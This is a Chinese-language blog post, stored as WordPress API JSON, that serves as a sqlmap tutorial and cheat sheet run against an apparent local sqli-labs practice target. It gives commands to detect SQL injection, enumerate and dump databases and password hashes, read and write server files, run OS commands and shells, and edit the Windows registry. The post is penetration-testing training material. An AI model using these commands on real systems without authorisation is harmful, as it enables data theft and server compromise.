{"id":46,"date":"2022-03-23T11:34:29","date_gmt":"2022-03-23T03:34:29","guid":{"rendered":"http:\/\/47.118.40.97:8082\/?p=46"},"modified":"2023-09-22T14:03:50","modified_gmt":"2023-09-22T06:03:50","slug":"sqlmap%e4%bd%bf%e7%94%a8%e6%94%bb%e7%95%a5","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=46","title":{"rendered":"SQLMap\u4f7f\u7528\u653b\u7565"},"content":{"rendered":"<h5>sqlmap\u7b80\u4ecb<\/h5>\n<p>sqlmap\u662f\u81ea\u52a8\u5316SQL\u6ce8\u5165\u5de5\u5177\uff0c\u5229\u7528SQL\u6ce8\u5165\u6f0f\u6d1e\u83b7\u53d6\u6570\u636e\u5e93\u670d\u52a1\u7684\u6743\u9650\u3002\u5b83\u5177\u6709\u529f\u80fd\u5f3a\u5927\u7684\u68c0\u6d4b\u5f15\u64ce,\u9488\u5bf9\u5404\u79cd\u4e0d\u540c\u7c7b\u578b\u6570\u636e\u5e93\u7684\u6e17\u900f\u6d4b\u8bd5\u7684\u529f\u80fd\u9009\u9879\uff0c\u5305\u62ec\u83b7\u53d6\u6570\u636e\u5e93\u4e2d\u5b58\u50a8\u7684\u6570\u636e\uff0c\u8bbf\u95ee\u64cd\u4f5c\u7cfb\u7edf\u6587\u4ef6\u751a\u81f3\u53ef\u4ee5\u901a\u8fc7\u5916\u5e26\u6570\u636e\u8fde\u63a5\u7684\u65b9\u5f0f\u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4<\/p>\n<p>sqlmap\u652f\u6301MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft  Access, IBM DB2, SQLite, Firebird,Sybase\u548cSAP MaxDB\u7b49\u6570\u636e\u5e93\u7684\u5404\u79cd\u5b89\u5168\u6f0f\u6d1e\u68c0\u6d4b\u3002<\/p>\n<p>sqlmap\u652f\u6301\u4e94\u79cd\u4e0d\u540c\u7684\u6ce8\u5165\u6a21\u5f0f\uff1a<\/p>\n<ol>\n<li>\u57fa\u4e8e\u5e03\u5c14\u7684\u76f2\u6ce8\uff0c\u5373\u53ef\u4ee5\u6839\u636e\u8fd4\u56de\u9875\u9762\u5224\u65ad\u6761\u4ef6\u771f\u5047\u7684\u6ce8\u5165<\/li>\n<li>\u57fa\u4e8e\u65f6\u95f4\u7684\u76f2\u6ce8\uff0c\u5373\u4e0d\u80fd\u6839\u636e\u9875\u9762\u8fd4\u56de\u5185\u5bb9\u5224\u65ad\u4efb\u4f55\u4fe1\u606f\uff0c\u7528\u6761\u4ef6\u8bed\u53e5\u67e5\u770b\u65f6\u95f4\u5ef6\u8fdf\u8bed\u53e5\u662f\u5426\u6267\u884c\uff08\u5373\u9875\u9762\u8fd4\u56de\u65f6\u95f4\u662f\u5426\u589e\u52a0\uff09\u6765\u5224\u65ad<\/li>\n<li>\u57fa\u4e8e\u62a5\u9519\u6ce8\u5165\uff0c\u5373\u9875\u9762\u4f1a\u8fd4\u56de\u9519\u8bef\u4fe1\u606f\uff0c\u6216\u8005\u628a\u6ce8\u5165\u7684\u8bed\u53e5\u7684\u7ed3\u679c\u76f4\u63a5\u8fd4\u56de\u5728\u9875\u9762\u4e2d<\/li>\n<li>\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff0c\u53ef\u4ee5\u4f7f\u7528union\u7684\u60c5\u51b5\u4e0b\u7684\u6ce8\u5165<\/li>\n<li>\u5806\u67e5\u8be2\u6ce8\u5165\uff0c\u53ef\u4ee5\u540c\u65f6\u6267\u884c\u591a\u6761\u8bed\u53e5\u7684\u6267\u884c\u65f6\u7684\u6ce8\u5165<\/li>\n<\/ol>\n<h5>sqlmap\u81ea\u52a8\u68c0\u6d4b\u6f0f\u6d1e<\/h5>\n<pre><code class=\"language-shell\">sqlmap -u 127.0.0.1:8082\/Less-6\/?id=1 --batch<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220323103846708.png\" alt=\"image-20220323103846708\" \/><\/p>\n<p>\u6210\u529f\u6d4b\u8bd5\u51faSQL\u6ce8\u5165\u6f0f\u6d1e<\/p>\n<h5>\u83b7\u53d6\u6570\u636e<\/h5>\n<pre><code class=\"language-shell\">\u5217\u51fa\u6570\u636e\u5e93\u4fe1\u606f\nsqlmap -u &quot;10.5.62.41:8082\/less-6\/?id=1&quot; --batch --dbs\n\u83b7\u53d6\u6570\u636e\u5e93\u4e2d\u7684\u8868\nsqlmap -u &quot;10.5.62.41:8082\/less-6\/?id=1&quot; --batch -D \u6570\u636e\u5e93\u540d --tables\n\u83b7\u53d6\u8868\u7684\u6240\u6709\u5217\nsqlmap -u &quot;10.5.62.41:8082\/less-6\/?id=1&quot; --batch -D \u6570\u636e\u5e93\u540d -T \u8868\u540d --columns\n\u83b7\u53d6\u76f8\u5e94\u5217\u7684\u5185\u5bb9\nsqlmap -u &quot;10.5.62.41:8082\/less-6\/?id=1&quot; --batch -D \u6570\u636e\u5e93\u540d -T \u8868\u540d -C \u5217\u540d\uff0c\u5217\u540d --dump\n\u5176\u4ed6\u6570\u636e\u5e93\u76f8\u5173\u64cd\u4f5c\nweb\u5f53\u524d\u4f7f\u7528\u7684\u6570\u636e\u5e93\uff1a--current-db\nweb\u6570\u636e\u5e93\u4f7f\u7528\u8d26\u6237\uff1a--current-user\n\u5217\u51fasqlserver\u6240\u6709\u7528\u6237\uff1a--users\n\u6570\u636e\u5e93\u8d26\u6237\u4e0e\u5bc6\u7801\uff1a--passwords\n\u5bfc\u51fa\u591a\u5c11\u6761\u6570\u636e\uff1a--start \u5f00\u59cb --stop \u7ed3\u675f\n\u679a\u4e3e\u6570\u636e\u5e93\u67b6\u6784\uff1a--schema\n\u679a\u4e3e\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7528\u6237\u7684\u89d2\u8272\uff1a--roles<\/code><\/pre>\n<h5>\u5176\u4ed6\u5e38\u7528\u53c2\u6570<\/h5>\n<pre><code class=\"language-shell\">\u663e\u793a\u4fe1\u606f\u7ea7\u522b\uff1a-v \u7ea7\u522b\n\u201c0\u201d\u53ea\u663e\u793apython\u9519\u8bef\u4ee5\u53ca\u4e25\u91cd\u7684\u4fe1\u606f\n\u201c1\u201d\u540c\u65f6\u663e\u793a\u57fa\u672c\u4fe1\u606f\u548c\u8b66\u544a\u4fe1\u606f\uff08\u9ed8\u8ba4\uff09\n\u201c2\u201d\u540c\u65f6\u663e\u793adebug\u4fe1\u606f\n\u201c3\u201d\u540c\u65f6\u663e\u793a\u6ce8\u5165\u7684payload\n\u201c4\u201d\u540c\u65f6\u663e\u793aHTTP\u8bf7\u6c42\n\u201c5\u201d\u540c\u65f6\u663e\u793aHTTP\u54cd\u5e94\u5934\n\u201c6\u201d\u540c\u65f6\u663e\u793aHTTP\u54cd\u5e94\u9875\u9762\n\u76ee\u6807\uff1a\n-d DIRECT    \u76f4\u63a5\u8fde\u63a5\u6570\u636e\u5e93\u7684\u8fde\u63a5\u5b57\u7b26\u4e32\n-u URL, --url=URL   \u76ee\u6807URL (e.g.&quot;http:\/\/www.site.com\/vuln.php?id=1&quot;)\uff0c\u4f7f\u7528-u\u6216\u8005--url \n-l LOGFILE     \u4eceBurp\u6216\u8005WebScarab\u4ee3\u7406\u65e5\u5fd7\u6587\u4ef6\u4e2d\u5206\u6790\u76ee\u6807\n-x SITEMAPURL  \u4ece\u8fdc\u7a0b\u7f51\u7ad9\u5730\u56fe\uff08sitemap.xml\uff09\u6587\u4ef6\u6765\u89e3\u6790\u76ee\u6807\n-m BULKFILE      \u5c06\u76ee\u6807\u5730\u5740\u4fdd\u5b58\u5728\u6587\u4ef6\u4e2d\uff0c\u4e00\u884c\u4e3a\u4e00\u4e2aURL\u5730\u5740\u8fdb\u884c\u6279\u91cf\u68c0\u6d4b\u3002\n-r REQUESTFILE   \u4ece\u6587\u4ef6\u52a0\u8f7dHTTP\u8bf7\u6c42\uff0csqlmap\u53ef\u4ee5\u4ece\u4e00\u4e2a\u6587\u672c\u6587\u4ef6\u4e2d\u83b7\u53d6HTTP\u8bf7\u6c42\uff0c\u8fd9\u6837\u5c31\u53ef\u4ee5\u8df3\u8fc7\u8bbe\u7f6e\u4e00\u4e9b\u5176\u4ed6\u53c2\u6570\uff08\u6bd4\u5982cookie\uff0cPOST\u6570\u636e\uff0c\u7b49\u7b49\uff09\uff0c\u8bf7\u6c42\u662fHTTPS\u7684\u65f6\u9700\u8981\u914d\u5408\u8fd9\u4e2a--force-ssl\u53c2\u6570\u6765\u4f7f\u7528\uff0c\u6216\u8005\u53ef\u4ee5\u5728Host\u5934\u540e\u95e8\u52a0\u4e0a:443\n--tamper=TAMPER   \u4f7f\u7528\u7ed9\u5b9a\u7684\u811a\u672c\u7be1\u6539\u6ce8\u5165\u6570\u636e\n\u8bf7\u6c42\uff1a\n--data=DATA   \u901a\u8fc7POST\u53d1\u9001\u6570\u636e\u53c2\u6570\uff0csqlmap\u4f1a\u50cf\u68c0\u6d4bGET\u53c2\u6570\u4e00\u6837\u68c0\u6d4bPOST\u7684\u53c2\u6570\n--cookie=COOKIE     HTTP Cookieheader\u503c\n--tor               \u4f7f\u7528Tor\u533f\u540d\u7f51\u7edc\n\u4f18\u5316\uff1a\n-o               \u6253\u5f00\u6240\u6709\u7684\u4f18\u5316\u5f00\u5173\n--predict-output    \u9884\u6d4b\u666e\u901a\u67e5\u8be2\u8f93\u51fa\n--keep-alive        \u4f7f\u7528\u6301\u4e45HTTP\uff08S\uff09\u8fde\u63a5\n--null-connection   \u83b7\u53d6\u9875\u9762\u957f\u5ea6\n--threads=THREADS   \u5f53\u524dhttp(s)\u6700\u5927\u8bf7\u6c42\u6570 (\u9ed8\u8ba4 1)\n\u68c0\u6d4b\uff1a\n--level=LEVEL     \u6267\u884c\u6d4b\u8bd5\u7684\u7b49\u7ea7\uff081-5\uff0c\u9ed8\u8ba4\u4e3a1\uff09\n--risk=RISK       \u6267\u884c\u6d4b\u8bd5\u7684\u98ce\u9669\uff080-3\uff0c\u9ed8\u8ba4\u4e3a1\uff09<\/code><\/pre>\n<blockquote>\n<p>\u8be6\u7ec6\u547d\u4ee4\u53c2\u6570\u53c2\u8003\uff1a<a href=\"https:\/\/xdym11235.com\/archives\/sqlmap.html\" target=\"_blank\"  rel=\"nofollow\" >https:\/\/xdym11235.com\/archives\/sqlmap.html<\/a><\/p>\n<\/blockquote>\n<h5>\u8bbf\u95ee\u6587\u4ef6\u7cfb\u7edf<\/h5>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u88ab\u7528\u6765\u8bbf\u95ee\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u5e95\u5c42\u6587\u4ef6\u7cfb\u7edf<\/p>\n<pre><code class=\"language-shell\">--file-read=RFILE   \u4ece\u540e\u7aef\u7684\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u6587\u4ef6\u7cfb\u7edf\u8bfb\u53d6\u6587\u4ef6\uff0cSQL Server2005\u4e2d\u8bfb\u53d6\u4e8c\u8fdb\u5236\u6587\u4ef6\n--file-write=WFILE  \u7f16\u8f91\u540e\u7aef\u7684\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u6587\u4ef6\u7cfb\u7edf\u4e0a\u7684\u672c\u5730\u6587\u4ef6\n--file-dest=DFILE   \u540e\u7aef\u7684\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u5199\u5165\u6587\u4ef6\u7684\u7edd\u5bf9\u8def\u5f84<\/code><\/pre>\n<h5>\u8bbf\u95ee\u64cd\u4f5c\u7cfb\u7edf<\/h5>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u7528\u4e8e\u8bbf\u95ee\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\u7684\u5e95\u5c42\u64cd\u4f5c\u7cfb\u7edf<\/p>\n<pre><code class=\"language-shell\">--os-cmd=OSCMD   \u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\uff08OSCMD\uff09\n--os-shell          \u4ea4\u4e92\u5f0f\u7684\u64cd\u4f5c\u7cfb\u7edf\u7684shell\n--os-pwn          \u83b7\u53d6\u4e00\u4e2aOOB shell\uff0cmeterpreter\u6216VNC\n--os-smbrelay       \u4e00\u952e\u83b7\u53d6\u4e00\u4e2aOOBshell\uff0cmeterpreter\u6216VNC\n--os-bof           \u5b58\u50a8\u8fc7\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u5229\u7528\n--priv-esc          \u6570\u636e\u5e93\u8fdb\u7a0b\u7528\u6237\u6743\u9650\u63d0\u5347\n--msf-path=MSFPATH  MetasploitFramework\u672c\u5730\u7684\u5b89\u88c5\u8def\u5f84\n--tmp-path=TMPPATH  \u8fdc\u7a0b\u4e34\u65f6\u6587\u4ef6\u76ee\u5f55\u7684\u7edd\u5bf9\u8def\u5f84<\/code><\/pre>\n<h5>Windows\u6ce8\u518c\u8868\u8bbf\u95ee<\/h5>\n<p>\u8fd9\u4e9b\u9009\u9879\u53ef\u4ee5\u88ab\u7528\u6765\u8bbf\u95ee\u540e\u7aef\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edfWindows\u6ce8\u518c\u8868<\/p>\n<pre><code class=\"language-shell\">--reg-read          \u8bfb\u4e00\u4e2aWindows\u6ce8\u518c\u8868\u9879\u503c\n--reg-add           \u5199\u4e00\u4e2aWindows\u6ce8\u518c\u8868\u9879\u503c\u6570\u636e\n--reg-del           \u5220\u9664Windows\u6ce8\u518c\u8868\u952e\u503c\n--reg-key=REGKEY    Windows\u6ce8\u518c\u8868\u952e\n--reg-value=REGVAL  Windows\u6ce8\u518c\u8868\u9879\u503c\n--reg-data=REGDATA  Windows\u6ce8\u518c\u8868\u952e\u503c\u6570\u636e\n--reg-type=REGTYPE  Windows\u6ce8\u518c\u8868\u9879\u503c\u7c7b\u578b<\/code><\/pre>\n<blockquote>\n<p>\u53c2\u8003\u6587\u7ae0\uff1a<a href=\"https:\/\/www.freebuf.com\/sectool\/164608.html\" target=\"_blank\"  rel=\"nofollow\" >https:\/\/www.freebuf.com\/sectool\/164608.html<\/a><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>sqlmap\u7b80\u4ecb sqlmap\u662f\u81ea\u52a8\u5316SQL\u6ce8\u5165\u5de5\u5177\uff0c\u5229\u7528SQL\u6ce8\u5165\u6f0f\u6d1e\u83b7\u53d6\u6570\u636e\u5e93\u670d\u52a1\u7684\u6743\u9650\u3002\u5b83\u5177\u6709\u529f\u80fd\u5f3a\u5927\u7684\u68c0\u6d4b\u5f15\u64ce,\u9488\u5bf9\u5404\u79cd\u4e0d &#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-46","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/46","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=46"}],"version-history":[{"count":3,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/46\/revisions"}],"predecessor-version":[{"id":139,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/46\/revisions\/139"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=46"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=46"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=46"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}